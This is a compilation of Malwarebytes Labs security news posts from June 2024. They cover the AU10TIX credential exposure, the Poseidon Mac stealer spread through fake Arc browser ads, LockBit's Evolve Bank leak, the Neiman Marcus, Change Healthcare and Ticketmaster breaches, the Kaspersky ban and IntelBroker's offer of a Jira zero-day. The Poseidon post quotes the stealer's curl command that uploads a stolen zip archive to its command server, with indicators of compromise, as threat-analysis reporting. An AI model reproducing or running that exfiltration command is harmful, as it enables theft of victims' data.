Researchers have found an online repository leaking sensitive data, including driving licenses and other identity documents.

A company that helps to authenticate users for big brands had a set of administration credentials exposed online for over a year, potentially allowing access to user identity documents such as driving licenses.

As more and more legislation emerges requiring websites and platforms—like gambling services, social networks, and porn sites—to verify their users’ age, the requirement for authentication companies offering that service rises.

You may never have heard of the Israeli based authentication company, AU10TIX, but you will certainly recognize some of its major customers, like Uber, TikTok, X, Fiverr, Coinbase, LinkedIn, and Saxo Bank.

AU10TIX checks users’ identities via the upload of a photo of an official document.

A researcher found that AU10TIX had left the credentials exposed, providing 404 Media with screenshots and data to demonstrate their findings. The credentials led to a logging platform containing data about people that had uploaded documents to prove their identity.

Whoever accessed the platform could peruse information about those people, including name, date of birth, nationality, identification number, and the type of uploaded document such as a drivers’ license, linking to an image of the identity document itself.

Research showed that the likely source of the credentials was an infostealer on a computer of a Network Operations Center Manager at AU10TIX.

Stolen credentials have shown to be a major source of breaches like those recently associated with Snowflake. Snowflake pointed to research which found that one cybercriminal obtained access to multiple organizations’ Snowflake customer instances using stolen customer credentials.

Another major problem is that these sets of credentials get traded and sold all the time. And it’s not as if when you sold them once, that’s it. Digital information can be copied and combined endlessly, leading to huge data sets that criminals can use as they see fit.

We’ve talked about the dangers of data brokers in the past. The California Privacy Protection Agency (CPPA) defines data brokers as businesses that consumers don’t directly interact with, but that buy and sell information about consumers from and to other businesses. There are around 480 data brokers registered with the CPPA. However, that might be just the tip of the iceberg, because there are a host of smaller players active that try to keep a low profile.

Either way, for any company and particularly an authentication company working with sensitive data, having such an account accessible with just login credentials should be grounds for serious penalties.

In a statement given to 404 Media, AU10TIX said it was no longer using the system and had no evidence the data had been used:

> “While PII data was potentially accessible, based on our current findings, we see no evidence that such data has been exploited. Our customers’ security is of the utmost importance, and they have been notified.”

For now, there’s not much that individual users of the brands can do apart from keep an eye out for any official statements, and consider an ongoing identity monitoring solution. Below are some general tips on what to do if your data has been part of a data breach:

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

****Check your personal data exposure****

You can check what personal information of yours has been exposed on our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

 Driving licences and other official documents leaked by authentication service used by Uber, TikTok, X, and more 

A competitor of the infamous Atomic Stealer targeting Mac users, has just launched a new campaign to lure in more victims.

On June 24, we observed a new campaign distributing a stealer targeting Mac users via malicious Google ads for the Arc browser. This is the second time in the past couple of months where we see Arc being used as a lure, certainly a sign of its popularity. It was previously used to drop a Windows RAT, also via Google ads.

The macOS stealer being dropped in this latest campaign is actively being developed as an Atomic Stealer competitor, with a large part of its code base being the same as its predecessor. Malwarebytes was previously tracking this payload as **OSX.RodStealer**, in reference to its author, Rodrigo4. The threat actor rebranded the new project ‘Poseidon’ and added a few new features such as looting VPN configurations.

In this blog post, we review the advertisement of the new Poseidon campaign from the cyber crime forum announcement, to the distribution of the new Mac malware via malvertising.

**Rodrigo4 launches new PR campaign**

A threat actor known by his handle as Rodrigo4 in the XSS underground forum has been working on a stealer with similar features and code base as the notorious Atomic Stealer (AMOS). The service consists of a malware panel with statistics and a builder with custom name, icon and AppleScript. The stealer offers functionalities reminescent of Atomic Stealer including: file grabber, crypto wallet extractor, password manager (Bitwarden, KeePassXC) stealer, and browser data collector.

In a post last edited on Sunday, June 23, Rodrigo4 announced a new branding for their project:

Forum post by Rodrigo4 on XSS

Hello everyone, we have released the V4 update and there are quite a lot of new things.  
The very first thing that catches your eye is the name of the project: Poseidon. Why is that? For PR management. In simple words, people didn’t know who we were.

Malware authors do need publicity, but we will try to stick to the facts and what we have observed in active malware delivery campaigns.

**Distribution via Google ads**

We saw an ad for the Arc browser belonging to ‘Coles & Co’, linking to the domain name _arcthost\[.\]org_:

Malicious ad for Arc browser via Google search

People who clicked on the ad were redirected to _arc-download\[.\]com_, a completely fake site offering Arc for Mac only:

Decoy website for Arc

The downloaded DMG file resembles what one would expect when installing a new Mac application with the exception of the right-click to open trick to bypass security protections:

Malicious Arc DMG installer

**Connection to new Poseidon project**

The new “Poseidon” stealer contains unfinished code that was seen by others, and also recently advertised to steal VPN configurations from Fortinet and OpenVPN:

Excerpt from forum post featuring new VPN capability

More interesting is the data exfiltration which is revealed in the following command:

set result\_send to (do shell script \\"curl -X POST -H \\\\\\"uuid: 399122bdb9844f7d934631745e22bd06\\\\\\" -H \\\\\\"user: H1N1\_Group\\\\\\" -H \\\\\\"buildid: id777\\\\\\" --data-binary @/tmp/out.zip http:// 79.137.192\[.\]4/p2p\\")

Navigating to this IP address reveals the new Poseidon branded panel:

Poseidon panel login page

**Conclusion**

There is an active scene for Mac malware development focused on stealers. As we can see in this post, there are many contributing factors to such a criminal enterprise. The vendor needs to convince potential customers that their product is feature-rich and has low detection from antivirus software.

Seeing campaigns distributing the new malware payload confirms that the threat is real and actively targeting new victims. Staying protected against these threats requires vigilance any time you download and install a new app.

Malwarebytes for Mac detects this this ‘Poseidon campaign as _**OSX.RodStealer**_ and we have already shared information related to the malicious ad with Google. We highly recommend using web protection that blocks ads and malicious websites as your first line of defense. Malwarebytes Browser Guard does both effectively.

**Indicators of Compromise**

Google ad domain

arcthost\[.\]org

Decoy site

arc-download\[.\]com

Download URL

zestyahhdog\[.\]com/Arc12645413\[.\]dmg

Payload SHA256

c1693ee747e31541919f84dfa89e36ca5b74074044b181656d95d7f40af34a05

C2

79.137.192\[.\]4/p2p

 &#8216;Poseidon&#8217; Mac stealer distributed via Google ads 

LockBit claimed to have breached Federal Reserve but in fact the data came from Evolve Bank & Trust

A shockwave went through the financial world when ransomware group LockBit claimed to have breached the US Federal Reserve, the central banking system of the United States.

On LockBit’s dark web leak site, the group threatened to release over 30 TB of banking information containing Americans’ banking data if a ransom wasn’t paid by June 25:

LockBit leak site

> “Federal banking is the term for the way the Federal Bank of America distributes its money. The Reserve operates twelve banking districts around the country which oversee money distribution within their respective districts. The twelve cities which are home to the Reserve Banks are Boston, New York City, Philadelphia, Richmond, Atlanta, Dallas, Saint Louis, Cleveland, Chicago, Minneapolis, Kansas City and San Francisco.
> 
> 33 terabytes of juicy banking information containing American’s banking secrets.”

The statement ends expressing the group’s disappointment about a negotiator who apparently offered to pay $50,000.

So, you can imagine that everyone was anticipating the end of the countdown that signalled the release of the stolen data with bated breath.

However, when that deadline passed and the data was released, people who looked at the data found it did not, in fact, belong to the Federal Reserve but instead to a particular financial organization: Evolve Bank & Trust.

Overview of the available data

All the links lead to directories containing data that seems to belong to Evolve.

There hasn’t been enough time to do a full analysis of the huge amount of data, but it appears it is only remotely tied to the Federal Reserve by some included links to a Federal Reserve press link from mid-June.

At that time, the US Federal Reserve Board penalized Evolve Bancorp and its subsidiary, Evolve Bank & Trust, for multiple “deficiencies” in the bank’s risk management, anti-money laundering (AML) and compliance practices.

According to the Federal Reserve statement released at the time:

> “In addition, Evolve did not maintain an effective risk management program or controls sufficient to comply with anti-money laundering laws and laws protecting consumers.”

So, as expected, LockBit drew a lot of attention under false pretences.

The group was disrupted by law enforcement in February of 2024 and their activity diminished as a result. As the ThreatDown monthly ransomware review of May review pointed out:

> “While LockBit is technically still alive, it’s fair to say the group is not what it was: Not only are its attacks dwindling, but in early May law enforcement also revealed the identity of alleged LockBit leader Dmitry Khoroshev, aka LockBitSupp. LockBitSupp, who is now subjected to a series of asset freezes and travel bans, also has a reward of up to $10 million over his head for information that leads to his arrest.”

And recently the FBI announced it had over 7,000 LockBit decryption keys in its possession, allowing it to help victims to recover data encrypted by the gang in past attacks. LockBit ransomware has impacted over 1,800 US victims, according to FBI stats.

Back to the data, it’s good news it appears not to be from the Federal Reserve. However, it’s not good news for customers of Evolve Bank & Trust and their data may well have been stolen and published. And it’s a lot of data.

A lot of data

We’ll keep you updated on this developing story. For now, there’s no official statement from Evolve, but there are general things to know if you think you have been involved in a data breach.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Malwarebytes has a new free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Federal Reserve &#8220;breached&#8221; data may actually belong to Evolve Bank 

Malwarebytes Premium blocked 100% of malware during the most recent testing by the AV Lab Cybersecurity Foundation.

Malwarebytes Premium Security has maintained its long-running, perfect record in protecting users against online threats by blocking 100% of the malware samples deployed in the AV Lab Cybersecurity Foundation’s “Advanced In-The-Wild Malware Test.”

For its performance in the May 2024 evaluation, Malwarebytes Premium Security also received a certificate of “Excellence.”

According to AV Lab, such certificates “are granted to solutions that are characterized by a high level of security, with a rating of at least 99% of blocked threats in the Advanced In-The-Wild Malware Test.”

Every two months, the cybersecurity and information security experts at AV Lab construct a series of tests to compare cybersecurity vendors against the latest malware that is currently being used by adversaries and threat actors.

For the May evaluation, AV Lab tested 521 unique malware samples against 13 cybersecurity products. Malwarebytes Premium Security detected 521/521 malware samples, with a remediation time of 44 seconds—well below the 52-second average determined by AV Lab in its most recent testing.

Three cybersecurity vendors failed to block 100% of malware tested: ESET, F-Secure, and Panda.

To ensure that AV Lab’s evaluations reflect current cyberthreats, each round of testing follows three steps:

1.  **Collecting and verifying in-the-wild malware**: AVLab regularly collects malware samples from malicious and active URLs, testing the malware samples to understand their impact to networks and endpoints.

2.  **Simulating a real-world scenario in testing**: To recreate how a real-life cyberattack would occur, AVLab uses the Firefox web browser to engage with the known, malicious URLs collected in the step prior. In the most recent test, AVLab emphasized the potential for these URLs to be sent over instant messaging platforms, including Discord and Telegram.

3.  **Incident recovery time assessment**: With the various cybersecurity products installed, AVLab measures whether the evaluated product detects a malware sample, when it detects a sample, and how long it took to detect that sample. The last metric is referred to as “Remediation Time.”

Malwarebytes is proud to once again achieve a 100% score with AVLab’s Advanced In-The-Wild Malware Test, a trusted resource that proves our commitment to user safety.

 Malwarebytes Premium Security stops 100% of malware during AV Lab test 

Almost immediately after Neiman Marcus began informing customers about a data breach, the alleged data was offered for sale.

Luxury retail chain Neiman Marcus has begun to inform customers about a cyberattack it discovered in May. The attacker compromised a database platform storing customers’ personal information.

The letter tells customers:

> “Promptly after learning of the issue, we took steps to contain it, including by disabling access to the relevant database platform.”

In the data breach notification, Neiman Marcus says 64,472 people are affected.

An investigation showed that the data contained information such as name, contact data, date of birth, and Neiman Marcus or Bergdorf Goodman gift card numbers. According to Neiman Marcus, the exposed data does not include gift card PINs. Shortly after the data breach disclosure, a cybercriminal going by the name “Sp1d3r” posted on BreachForums that they were willing to sell the data.

Image courtesy of Daily Dark Web

> “Neiman Marcus not interested in paying to secure data. We give them opportunity to pay and they decline. Now we sell. Enjoy!”

According to Sp1d3r, the data includes name, address, phone, dates of birth, email, last four digits of Social Security Numbers, and much more in 6 billion rows of customer shopping records, employee data, and store information.

Neiman Marcus is reportedly one of the many victims of the Snowflake incident, in which the third-party platform used by many big brands was targeted by cybercriminals. The name Sp1d3r has been associated with the selling of information belonging to other Snowflake customers.

Oddly enough, Sp1d3r’s post seems to have since disappeared.

Later screenshot

Sp1d3r’s post count went down back to 19 instead of the 20 displayed in the screenshot above.

So, the post has either been removed, withdrawn, or hidden for reasons which are currently unknown. As usual, we will keep an eye on how this develops.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**Check your exposure**

While matters are still unclear on how much information was involved in the Neiman Marcus breach, it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Neiman Marcus confirms breach. Is the customer data already for sale? 

Change Healthcare has detailed the types of medical and patient data that was stolen in a recent ransomware attack.

For the first time since news broke about a ransomware attack on Change Healthcare, the company has released details about the data stolen during the attack.

First, a quick refresher: On February 21, 2024, Change Healthcare experienced serious system outages due to a cyberattack. The incident led to widespread billing outages, as well as disruptions at pharmacies across the United States. Patients were left facing enormous pharmacy bills, small medical providers teetered on the edge of insolvency, and the government scrambled to keep the money flowing and the lights on. The ransomware group ALPHV claimed responsibility for the attack.

But shortly after, the ALPHV group disappeared in an unconvincing exit scam designed to make it look as if the FBI had seized control over the group’s website. Then a new ransomware group, RansomHub, listed the organization as a victim on its dark web leak site, saying it possessed 4 TB of “highly selective data,” relating to “all Change Health clients that have sensitive data being processed by the company.”

In April, parent company UnitedHealth Group released an update, saying:

> “Based on initial targeted data sampling to date, the company has found files containing protected health information (PHI) or personally identifiable information (PII), which could cover a substantial proportion of people in America.”

Now, Change Healthcare has detailed the types of medical and patient data that was stolen. Although Change cannot provide exact details for every individual, the exposed information may include:

*   Contact information: Names, addresses, dates of birth, phone numbers, and email addresses.
*   Health insurance information: Details about primary, secondary, or other health plans/policies, insurance companies, member/group ID numbers, and Medicaid-Medicare-government payor ID numbers.
*   Health information: Medical record numbers, providers, diagnoses, medicines, test results, images, and details of care and treatment.
*   Billing, claims, and payment information: Claim numbers, account numbers, billing codes, payment card details, financial and banking information, payments made, and balances due.
*   Other personal information: Social Security numbers, driver’s license or state ID numbers, and passport numbers.

Change Healthcare added:

> “The information that may have been involved will not be the same for every impacted individual. To date, we have not yet seen full medical histories appear in the data review.”

Change Healthcare says it will send written letters—as long as it has a person’s address and they haven’t opted out of notifications—once it has concluded the data review.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

Malwarebytes has a new free tool for you to check how much of your personal data has been exposed online. Submit your email address (it’s best to give the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report and recommendations.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Change Healthcare confirms the customer data stolen in ransomware attack 

A list of topics we covered in the week of June 17 to June 23 of 2024

June 21, 2024 - A cybercriminals is giving 1 million data records from the Ticketmaster breach away for free, saying that Ticketmaster refused to pay

June 21, 2024 - “Immediately stop using \[Kaspersky\] and switch to an alternative” warned the Commerce Secretary in a new US ban of the antivirus provider.

June 21, 2024 - IntelBroker is offering source code from major companies for sale. Are they demonstrating the value of a zero-day they are also selling?

June 20, 2024 - The FTC has referred a complaint against TikTok and its parent company ByteDance to the Department of Justice.

June 18, 2024 - Despite existing countermeasures, Android overlays are still used in malware attacks and phishing. What are they and what can we do?

 A week in security (June 17 &#8211; June 23) 

A cybercriminals is giving 1 million data records from the Ticketmaster breach away for free, saying that Ticketmaster refused to pay

The cybercriminal acting under the name “Sp1d3r” gave away the first 1 million records that are part of the data set that they claimed to have stolen from Ticketmaster/Live Nation. The files were released without a price, for free.

When Malwarebytes Labs first learned about this data breach, it happened to be the first major event that was shared on the resurrected BreachForums, and someone acting under the handle “ShinyHunters” offered the full details (name, address, email, phone) of 560 million customers for sale.

The same data set was offered for sale in an almost identical post on another forum by someone using the handle “SpidermanData.” This could be the same person or a member of the ShinyHunters group.

Following this event, Malwarebytes Labs advised readers on how to respond and stay safe. Importantly, even when a breach isn’t a “breach”—in that immediate moment when the details have yet to be confirmed and a breach subject is readying its public statements—the very news of the suspected breach can be used by advantageous cybercriminals as a phishing lure.

Later, Ticketmaster confirmed the data breach.

Bleeping Computer spoke to ShinyHunters who said they already had interested buyers. Now, Sp1d3r, who was seen posting earlier about Advance Auto Parts customer data and Truist Bank data, has released 1 million Ticketmaster related data records for free.

Post by Sp1d3r

In a post on BreachForums, Sp1d3r said:

> “Ticketmaster will not respond to request to buy data from us.
> 
> They care not for the privacy of 680 million customers, so give you the first 1 million users free.”

The cybercriminals that are active on those forums will jump at the occasion and undoubtedly try to monetize those records. This likely means that innocent users that are included in the first million released records could receive a heavy volume of spam and phishing emails in the coming days.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

**Check your exposure**

While matters are still unclear how much information was involved, it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 First million breached Ticketmaster records released for free 

“Immediately stop using [Kaspersky] and switch to an alternative” warned the Commerce Secretary in a new US ban of the antivirus provider.

The US government will ban the sale of Kaspersky antivirus products to new customers in the United States starting July 20, with a follow-on deadline to prohibit the cybersecurity company from providing users with software updates after September 29.

The move follows years of allegations that the cybersecurity firm served as a hacking conduit for Russian intelligence agencies—allegations that the company has consistently denied.  

While current US Kaspersky customers will see no immediate impact from the ban, the September 29 software update deadline signals a bigger change. Without available updates, any cybersecurity product becomes less secure over time, and means the company won’t be able to protect customers against the newest threats.

In a briefing call with reporters on Thursday, US Department of Commerce Secretary Gina Raimondo offered consolation and advice to current customers of the antivirus products:

> “You have done nothing wrong, and you are not subject to any criminal or civil penalties. However, I would encourage you, in as strong as possible terms, to immediately stop using that software and switch to an alternative in order to protect yourself and your data and your family.”

Kaspersky rebuffed the Biden Administration’s decision in a statement shared on social media Thursday.

“Kaspersky does not engage in activities which threaten US national security and, in fact, has made significant contributions with its reporting and protection from a variety of threat actors that targeted US interested and allies,” the company said. “The company intends to purse all legally available options to preserve its current operations and relationships.”

The ban, first reported by Reuters and released Thursday, includes “AO Kaspersky Lab,” “OOO Kaspersky Group,” and “Kaspersky Labs Limited.”

According to the US Department of Commerce, all three Kaspersky entities are being banned “for their cooperation with Russian military and intelligence authorities in support of the Russian government’s cyber intelligence objectives.”

In October 2017, The New York Times reported that Israeli intelligence officers managed to catch Russian government hackers using Kaspersky to conduct clandestine searches across the globe. That reporting followed a bombshell investigation from The Wall Street Journal that claimed that Russian hackers stole classified NSA materials from a contractor’s personal computer which had Kaspersky software installed on it.

That reported hacking incident allegedly resulted in the US government’s decision that same year to remove Kaspersky antivirus software from US government devices.

In the same Thursday briefing call, Secretary Raimondo cited the threat of Russian influence in the Department’s decision to ban Kaspersky:

> “Russia has shown it has the capacity and… the intent to exploit Russian companies like Kaspersky to collect and weaponize the personal information of Americans and that is why we are compelled to take the action that we are taking today.”

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 US bans Kaspersky, warns: “Immediately stop using that software&#8221; 

IntelBroker is offering source code from major companies for sale. Are they demonstrating the value of a zero-day they are also selling?

A moderator of the notorious data breach trading platform BreachForums is offering data for sale they claim comes from a data breach at T-Mobile.

The moderator, going by the name of IntelBroker, describes the data as containing source code, SQL files, images, Terraform data, t-mobile.com certifications, and “Siloprograms.” (We’ve not heard of siloprograms, and can’t find a reference to them anywhere, so perhaps it’s a mistranslation or typo.)

Post offereing data for sale supposedly from a T-Mobile internal breach

To prove they had the data, IntelBroker posted several screenshots showing access with administrative privileges to a Confluence server and T-Mobile’s internal Slack channels for developers.

But according to sources known to BleepingComputer, the data shared by IntelBroker actually consists of older screenshots. These screenshots show T-Mobile’s infrastructure, posted at a known—yet unnamed—third-party vendor’s servers, from where they were stolen.

When we looked at the screenshots IntelBroker attached to their post, we spotted something interesting in one of them.

Found CVE-2024-1597

This screenshot shows a search query for a critical vulnerability in Jira, a project management tool used by teams to plan, track, release and support software. It’s typically a place where you could find the source code of works in progress.

The search returns the result CVE-2024-1597, a SQL injection vulnerability. SQL injection happens when a cybercriminal injects malicious SQL code into a form on a website, such as a login page, instead of the data the form is asking for. The vulnerability affects Confluence Data Center and Server according to Atlassian’s May security bulletin.

For a better understanding, it’s important to note that Jira and Confluence are both products created by Atlassian, where Jira is the project management and issue tracking tool and Confluence is the collaboration and documentation tool. They are often used together.

If IntelBroker has a working exploit for the SQL injection vulnerability, this could also explain their claim that they have the source code of three internal tools used at Apple, including a single sign-on authentication system known as AppleConnect.

This theory is supported by the fact that IntelBroker is also offering a Jira zero-day for sale.

IntelBroker selling zero-day for JIra

> “I’m selling a zero-day RCE for Atlassian’s Jira.
> 
> Works for the latest version of the desktop app, as well as Jira with confluence.
> 
> No login is required for this, and works with Okta SSO.”

If this is true then this exploit, or its fruits, might be used for data breaches that involve personal data.

Meanwhile, T-Mobile has denied it has suffered a breach, saying it is investigating whether there has been a breach at a third-party provider.

> “We have no indication that T-Mobile customer data or source code was included and can confirm that the bad actor’s claim that T-Mobile’s infrastructure was accessed is false.”

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Source

Malwarebytes